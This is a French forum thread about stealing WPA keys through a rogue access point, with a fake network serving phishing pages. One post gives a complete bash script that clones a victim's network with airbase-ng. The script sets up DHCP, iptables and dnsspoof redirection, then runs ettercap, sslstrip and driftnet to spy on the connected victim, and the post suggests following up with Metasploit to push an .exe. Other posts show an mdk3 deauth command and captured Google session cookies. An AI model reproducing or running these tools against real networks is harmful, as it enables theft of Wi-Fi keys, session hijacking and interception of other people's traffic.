Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#251 18-12-2010 16:17:33

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Technique de recuperation de clef WPA par rogue et PHP.

Salut smile

J'ai testé ça chez moi et sa marche(a condition de pas trop s'éloigner...)plusieurs pc se sont connecté a ma rogue mais le mien a obtenu une ip en 169... alors que les autres pc ont eut une ip en 10.0.0.2 et 10.0.0.7 respectivement,donc il y a surement encore des choses a voir pour rendre tout sa parfait wink

J'ai aussi remplacer mon réseau original par mon fake en open,bref plusieurs belles pistes sont encore a découvrir big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#252 18-12-2010 16:58:25

Mysterio
N00b
Inscription : 18-12-2010
Messages : 1

Re : Technique de recuperation de clef WPA par rogue et PHP.

Hors Ligne

#253 19-12-2010 13:52:28

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Technique de recuperation de clef WPA par rogue et PHP.

Salut, j'ai adapté le script karmetsaploit pour unbutu,je tente une attaque karmetasploit et grab de clé wpa en meme temps,sa marche mais ce que j'obitens avec karmetasploit quand la page loading s'affiche sur l'autre pc semble crypté...

Voici un exemple:

[*] HTTP REQUEST 10.0.0.2 > toolbarqueries.clients.google.com:80 POST /tbproxy/af/query Windows   cookies=rememberme=true; NID=40=WDRFEYNRIUfevUdsaK-p6DPwwwyyIwsyp_R7_0P5z52aOYvfWNMzmUEckeB9uh6I-jJIGOKecnWYtpVc3Ck1AxgK0MiW-OS60NkCHh_ZzAaanvkGBZl4gESYOHpZWvd8; PREF=ID=c2fbeb41ecf41cac:U=85c1c2800562354e:FF=0:TM=1279205620:LM=1289411061:GM=1:S=6uvcF7nQHu_u3Rq8; SID=DQAAAHkAAABepR9TQbq5LXD4E25DsmNVGfkYDluzAROsS3eGJsbnGiBNwJDWN1azaaZy18kv-TVye9kKos2gretUB6SKj2_CWmw3gR6FgmrJHuSyF_Y2gXH5wpg4EKsiNkhjzOGGEamhIkLYIQ3RZiz5O37wpNvVkoAaF4ji1yHXcSOn6STDUQ; HSID=ABZSNbhm1y3toIsh6

C'est illisible(en tous cas pour le modeste pentesteur que je suis) smile

Hors Ligne

#254 11-01-2011 02:04:18

Ratatoskr
Membre
Inscription : 08-01-2011
Messages : 11

Re : Technique de recuperation de clef WPA par rogue et PHP.

Je viens de tester rapidos avec un pc qui héberge le fake AP et un autre qui est en auto-connect sur mon WPA, ça marche sans soucis. Je pense que la (très) faible distance entre les deux y est pour quelque chose, mais ça peut changer avec une meilleure antenne !

Reste plus qu'à tester karma et des "mise à jour de votre routeur" :p

Hors Ligne

#255 17-01-2011 12:50:12

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Technique de recuperation de clef WPA par rogue et PHP.

Salut wink j'ai testé la reconnexion automatique du vrai AP au fake et contrairement a la dernière fois il semble que certains AP soit imunisé dont ma livebox:

mdk3 mon0 g -t 00:19:E7:50:E6:0A
Deauth cycles:    0  802.1x authentication packets:    0  WEP/Unencrypted packets:    0  Beacons/sec:   0
NOTICE: Did not receive any beacons! Maybe AP has been reconfigured and/or is rebooting!
Deauth cycles:    0  802.1x authentication packets:    0  WEP/Unencrypted packets:    0  Beacons/sec:   0
NOTICE: Did not receive any beacons! Maybe AP has been reconfigured and/or is rebooting!
Deauth cycles:    0  802.1x authentication packets:    0  WEP/Unencrypted packets:    0  Beacons/sec:   0

etc...

C'est étrange car la première fois sa avait marché,peut etre que les boxs comportent une sorte de "deauth limite" a ne pas dépasser.

Hors Ligne

#256 17-01-2011 13:43:58

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Technique de recuperation de clef WPA par rogue et PHP.

ah ça fait plaisir de voir que l'on se penche enfin sur les faiblesses des machines distribué cela fait longtemps que l'on aurais du prendre au sérieux les failles des box distribué par défaut

la full disclosure ne protégera jamais ceux qui ne maitrise pas l'informatique et la police ne pourra rien contre de vraie personnes mal intentionné (il ne s'inscrive pas sur les forums eux)

a quand une mise a jour qui efface définitivement l'option "wep" ou une vraie information aux abonnés que nous sommes...

Hors Ligne

#257 17-01-2011 19:17:41

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Technique de recuperation de clef WPA par rogue et PHP.

Certe sa fais plaisir de voir que l'on est un minimum protéger mais moi je vois sa plutot comme une motivation a trouver une nouvelle faiblesse que ce soit en utilisant mdk3 ou autre wink fouiner,tester,découvrir sont des chose passionnantes roll

Hors Ligne

#258 20-01-2011 19:52:21

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Technique de recuperation de clef WPA par rogue et PHP.

Alors pour info on est pas obliger de "deauther" la box pour la faire crasher (d'ailleurs maintenant, pour la plupart les box sont immunisées).

On ne va pas crasher la box mais on peut "corrompre" le gestionnaire sans fil windows, je m'explique windows et configurer pour se connecter a un réseau dont il a confiance si votre livebox et en WPA et que vous créer un réseau en open du meme nom:

1 la victime ne se connectera pas
2 le vrai point d'accès emetra toujours

Par contre si vous créer un réseau en WPA avec les paramètre du vrai mais en changeant le cipher par exemple CCMP au lieu de TKIP (faisable en jouant avec airbase) Au bout de quelque minutes le client windows verra devant son réseau une croix rouge avec un truc du genre:

Les paramètre enregistré sur cette ordinateur pour ce réseau ne correspondent pas avec ceux du réseau

et vous ne pourrez jamais vous connecté dessus pour la bonne et simple raison que windows ne reconnait pas ce réseau car le cypher a changé donc par mesure de sécurité il lui est impossible de se connecter dessus.

Lancez alors en parallèle un second réseau du meme nom que le réel sans spécifier le canal ni le bssid et essayer d'etre patient pour la suite que la victime voyent son réseau planter et se connecte sur le fake en open big_smile

Bref vous pourrez tester par vous meme car j'ai fais un petit script tous con.

Nom du script: Le double effet KissCool (je savais pas quoi mettre comme nom et je machais un chewing-gom lol )

Le script fonctionne pour mon unbutu 9.10
Materiel requis: 2 carte réseau
       est requis également: dhcp3, apache2, et un dhcpd.conf correctement configuré.
Si votre réseau et en WPA/TKIP choissisez l'option 5, et 6 pour WPA/CCMP,ces options permettent juste de changer le cipher rien d'exeptionnel d'ou le nom "faille 0" car il n'y a tous simplement pas de faille.

Notez, pour eviter les confusions que je commence par créer le réseau en open en premier d'ou le "airmon-ng start wlan1" qui correspond a ma carte alpha,c'est un choix mais vous pouvez bien sur faire l'inverse wink

#!/bin/bash
intro="\n
-----------------------------------\n
~~~~~~~ \033[01;34mKissCool - Unbutu9.10\033[0m ~~~~~~\n
-----------------------------------\n"
ok="[\033[01;32mOK\033[0m]"

menu(){
clear
echo -e $intro
echo -e "\033[01;31m1ere étape (obligatoire):\033[0m"
echo ">> 1 Mode moniteur"
echo ">> 2 Lancer airbase-ng"
echo ">> 3 lancer un faux réseau en local"
echo ">> 4 Changement de carte"
echo ">> 5 Faille 0 WPA TKIP"
echo ">> 6 Faille 0 WPA CCMP"
echo ">> 7 serveur web"
echo ">> 8 surveillance de la victime"
echo ">> 9 espionage réseau"
echo ">> 10 quitter"
echo
echo -n ">> Choix : " ; read choix
case $choix in


1)
clear
echo -e $intro
echo -e "\033[01;31m   --== airmon-ng ==--\033[0m"
echo
echo -n "passage en mode moniteur..." ;
xterm -hold -e airmon-ng start wlan1 &> /dev/null &
echo -e $ok
sleep 2
;;

2)
clear
echo -e $intro
echo -e "\033[01;31m   --== airbase-ng ==--\033[0m"
echo
xterm -hold -e airbase-ng -c $canal -e $reseauvoulu mon0 &> /dev/null &
echo -e $ok
sleep 3
;;

3)
clear
echo -e $intro
echo -e "\033[01;31m   --== réseau sans internet ==--\033[0m"
echo
echo -n "Montage de at0..." ;
ifconfig at0 up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
echo -e $ok
echo -n "Démarrage du serveur" ;
cd / ;
cd etc ;
echo > dhcpd.leases ;
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null ;
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1 ;
iptables -P FORWARD ACCEPT ;
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80 ;
echo -e $ok
xterm -hold -e /etc/init.d/dhcp3-server restart &> /dev/null &
echo -e $ok
sleep 4
;;

4)
clear
echo -e $intro
echo -e "\033[01;31m   --== basculement sur wlan0 ==--\033[0m"
echo
xterm -hold -e airmon-ng start wlan0 &> /dev/null &
echo -e $ok
sleep 5
;;

5)
clear
echo -e $intro
echo -e "\033[01;31m   --== Coruption du réseau ==--\033[0m"
echo
echo -n "plantage de la box" ;
xterm -hold -e airbase-ng -c $canal -e $essid -a $bssid -I 600 -Z 4 mon1 &> /dev/null &
echo -e $ok
sleep 6
;;

6)
clear
echo -e $intro
echo -e "\033[01;31m   --== Coruption du réseau ==--\033[0m"
echo
echo -n "plantage de la box" ;
xterm -hold -e airbase-ng -c $canal -e $essid -a $bssid -I 600 -Z 2 mon1 &> /dev/nul &
echo -e $ok
sleep 7
;;

7)
clear
echo -e $intro
echo -e "\033[01;31m   --== serveur web ==--\033[0m"
echo
echo -n "Apache2" ;
xterm -hold -e service apache2 stop &> /dev/null &
echo -e $ok
xterm -hold -e service apache2 restart &> /dev/null &
echo -e $ok
echo -n "montage de dnspoison" ;
xterm -hold -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &
echo -e $ok
sleep 8
;;

8)
clear
echo -e $intro
echo -e "\033[01;31m   --== Que fait t-il? ==--\033[0m"
xterm -hold -e wireshark &> /dev/null &
echo -e $ok
sleep 9
;;

9)
clear
echo -e $intro
echo -e "\033[01;31m   --== Espionage ==--\033[0m"
echo
echo -n "Démarrage ettercap" ;
xterm -hold -e ettercap -T -q -p -i at0 // // &> /dev/null & ettpid=$!
echo -e $ok
echo -n "Démarrage sslstrip" ;
echo 1 > /proc/sys/net/ipv4/ip_forward ;
xterm -hold -e sslstrip -a -k -f &> /dev/null & sslpid=$
echo -e $ok
echo -n "Démarrage driftnet" ;
xterm -hold -e driftnet -v -i at0 &> /dev/null & driftpid=$
echo -e $ok
sleep 10
;;

10)
clear
echo -e $intro
echo -n "Crack réussi ma poul:)" ;
echo -e $ok
clear
exit
;;

esac
}
while true;do menu
done
exit

Une fois que la victime et connecté vous pouvez alors aussi utiliser metasploit pour tenter d'ouvrir une session et pourquoi pas utiliser un exploit pour envoyer un .exe wink
Il n'y a rien d'exeptionnel la dedans et ce n'est pas la solution miracle a un crack WPA mais toujours marant a tester roll

Dernière modification par koala (20-01-2011 20:01:46)

Hors Ligne

#259 25-01-2011 01:35:07

apocalipto
N00b
Inscription : 25-01-2011
Messages : 1

Re : Technique de recuperation de clef WPA par rogue et PHP.

Bonsoir messieurs dames,j'utilise backtrack 4 sur mon ordinateur vaio  via une cle flash pour utiliser aircrack! tout ce passe tres bien jusqu'au moment ou je fais : airodump-ng wlan0 : je ne vois aucun reseau apparaitre,

ma demarche est la suivante:
airmin -ng
airmon-ng start wlan0
airodump-ng wlan0
et puis rien ne s'affiche j ai cherche pendant 3 heures sur google on disait que c'est peut etre ma carte wifi qui n'est pas compatible avec blacktrack si c'est le cas comment savoir le type de ma carte?
quelqu'un pourrait-il me donner une solution?? Mercii d'avance!
ps:je suis nouveau sur black track

Hors Ligne

#260 25-01-2011 02:16:21

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Technique de recuperation de clef WPA par rogue et PHP.

Normalement airmon-ng start wlan0 te donne l'interface en mode moniteur mon0 donc ensuite c'est: airodump-ng mon0, et si ce n'est pas le cas renvoi l'erreur que t'affiches la console wink

Ps: je vois pas trop ce que ton problème fait dans ce topic

Hors Ligne

#261 22-04-2011 09:37:01

ant0ny
Membre
Inscription : 15-04-2011
Messages : 20

Re : Technique de recuperation de clef WPA par rogue et PHP.

koala a écrit :

Normalement airmon-ng start wlan0 te donne l'interface en mode moniteur mon0 donc ensuite c'est: airodump-ng mon0, et si ce n'est pas le cas renvoi l'erreur que t'affiches la console wink

Ps: je vois pas trop ce que ton problème fait dans ce topic

moi si je fait:

airmon-ng start wlan0

ensuite je doit faire:

airodump-ng wlan0 et pas airodump-ng mon0

enfin soit juste pour dire ca en cas ou il y en a un qui insiste avec mon0...


Sinon j'ai une vrai question lol

Comment je peux faire pour créer un reseau OPN (choix canal et essid) et heberger des page html sur mon pc et quand les personne qui s'y connecte arrive directement vers ma page index.html et ne peuvent qu'aller sur les page qui sont avec index.html???

Merci a vous wink

j'ai suivi ceci: http://bricowifi.blogspot.com/2008/09/t … ploit.html

mais ca recupere les cookie mais se n'est pas se que je veux. merci

Hors Ligne

#262 22-04-2011 10:52:37

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Technique de recuperation de clef WPA par rogue et PHP.

Si tu es sous BackTrack3, elle utilise encore l'ancienne pile WiFi donc effectivement c'est wlan0 qu'il faut utiliser même ne mode monitor. A partir de BT4, ça sera systématiquement mon0 qu'il faut utiliser (sauf pilote particulier) wink

Pour ta "vraie question" je t'invite à créer un nouveau topic, elle n'a rien à voir avec le sujet ici wink

Hors Ligne

#263 22-04-2011 10:55:57

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Technique de recuperation de clef WPA par rogue et PHP.

C'est quoi tous ces vieux boucs qui s'entêtent à rester sous de vieilles versions, il y a bientôt la version 5 de backtrack qui sort.

Vivez avec votre temps les gars !!!!!!!!

Coup de grogne du matin , faut pas me gonfler quand je viens de paumer ma première partie d'échecs de la journée !!!! pam

PS: Désolé pour le caractère non constructif, mais j'ai constaté ces derniers temps pas mal de posts de gens ayant des problèmes sous La version trois, dont au moins 50% auraient été réglés par un simple passage à la version 4r2 !!!!


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#264 22-04-2011 11:16:37

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Technique de recuperation de clef WPA par rogue et PHP.

Tu oublies 2 points importants, ô subtil bovidé...
- La majorité des tutos en français se basent sur BT3 (d'ailleurs ce site continue à proposer, en topic épinglé, une version modifiée de BT3)
- SpoonWEP et SpoonWPA ne fonctionnent que sur la version 3... Et crois-moi, pour un débutant (ou un paresseux) c'est un point important smile

Le non-constructivisme vaincra ! (enfin, pas trop quand même...)

Hors Ligne

#265 22-04-2011 11:19:13

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Technique de recuperation de clef WPA par rogue et PHP.

Oui mais j'ai perdu aux échecs alors peu importe il fallait que quelqu'un morfle !!!!

Désolé quand même pour le hs ça fait pas sérieux de ma part smile


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#266 22-04-2011 12:45:29

ant0ny
Membre
Inscription : 15-04-2011
Messages : 20

Re : Technique de recuperation de clef WPA par rogue et PHP.

ha merci pour l'info mon0 sous BT4... voila pourquoi pas changer looool ca modifie tout....

Sinon la raison serait aussi que l'on trouve bcp de tuto sous BT3 et non sous BT4. J'ai chercher un tuto pour installer BT4 en dual boot et j'ai rien trouver qui me donne confiance de me lancer...

Hors Ligne

#267 25-07-2011 04:07:39

c0ldfire
Nouveau membre
Inscription : 25-07-2011
Messages : 5

Re : Technique de recuperation de clef WPA par rogue et PHP.

bonjour, je ne sais pas si quelq'un regarde encore ce topic...
J'ai tester GTWPA et il fonctionne bien, mais je n'arrive pas a trouver le fichier .txt avec la cle recuperee .. voila
Quelqu'un pourrait-il me guider?
Merci

Hors Ligne

#268 25-07-2011 05:14:08

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Technique de recuperation de clef WPA par rogue et PHP.

Bonjour cOldfire, inutile de poser la même question sur 2 topics différents.
Le double post n'est pas très bien vu ici, même si la question n'est pas posée exactement de la même manière wink.

Voir règlement section n° 10.

Si tu es pressé ou que tu as peur de ne pas avoir de réponse, le mieux est encore de poser ta question dans un topic dédiée.

Cordialement.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#269 30-10-2011 17:41:36

newmen
Membre Indéboulonnable
Inscription : 07-07-2011
Messages : 125

Re : Technique de recuperation de clef WPA par rogue et PHP.

bonjour
je remonte le topic car je suis intéressé par cette méthode
je cherche des tuto sur ça pour essayer
merci

Hors Ligne

#270 30-10-2011 18:26:37

mzutg
Membre Indéboulonnable
Inscription : 29-04-2011
Messages : 118

Re : Technique de recuperation de clef WPA par rogue et PHP.

J'ai une question sur le rogue AP :
On utilise enfet le fait que le client ait un profil d'AP enregistré qui permet la connexion automatique à l'AP. Mais dans ce profil il y a la clé WPA mais pas dans notre rogue AP mais le client se connecte quand meme ?

Hors Ligne

#271 31-10-2011 03:28:00

webcapitain
Membre Indéboulonnable
Inscription : 21-11-2008
Messages : 143

Re : Technique de recuperation de clef WPA par rogue et PHP.

mzutg a écrit :

J'ai une question sur le rogue AP :
On utilise enfet le fait que le client ait un profil d'AP enregistré qui permet la connexion automatique à l'AP. Mais dans ce profil il y a la clé WPA mais pas dans notre rogue AP mais le client se connecte quand meme ?

Salut mzutg
Pour le moment ce projet est en suspens, il n'est pas terminé car il nous manque le fameux tkiptun-ng pour rediriger le client vers la fake ap.
Si tu veux en savoir plus sur l'outil c'est ici : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Dernière modification par webcapitain (31-10-2011 03:30:11)

Hors Ligne

#272 31-10-2011 10:15:22

mzutg
Membre Indéboulonnable
Inscription : 29-04-2011
Messages : 118

Re : Technique de recuperation de clef WPA par rogue et PHP.

Merci pour le link. Mais au niveau WPA/WPA2 c'est bien le fait que le client demande un connexion cryptée, qu'on ne peut lui fournir puisque qu'on ne connaît pas la clé, qui pose problème ?

Hors Ligne

#273 31-10-2011 12:58:54

newmen
Membre Indéboulonnable
Inscription : 07-07-2011
Messages : 125

Re : Technique de recuperation de clef WPA par rogue et PHP.

en suspens?
pourtant j'ai trouver un tuto complet pour le ap rogue
que ce que vous en dites?

Hors Ligne

#274 01-11-2011 15:27:46

newmen
Membre Indéboulonnable
Inscription : 07-07-2011
Messages : 125

Re : Technique de recuperation de clef WPA par rogue et PHP.

est ce que c'est un bon tuto que je peut suivre?

Hors Ligne

#275 01-11-2011 15:46:19

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Technique de recuperation de clef WPA par rogue et PHP.

Oui tu peux suivre ce tuto wink

Il faut bien que tu retiennes a quoi sert le dhcp, et aussi te familiariser avec iptables, autre chose a chaque modification importante que tu fais dans apache redémarre le bien comme il faut et si besoin est tu code tes fakes pages toi meme wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2170 28-11-2016 19:42:10 par koala
35 1793 23-11-2016 16:31:33 par roofnat
16 1042 17-11-2016 12:22:00 par disquette
10 427 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 450 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]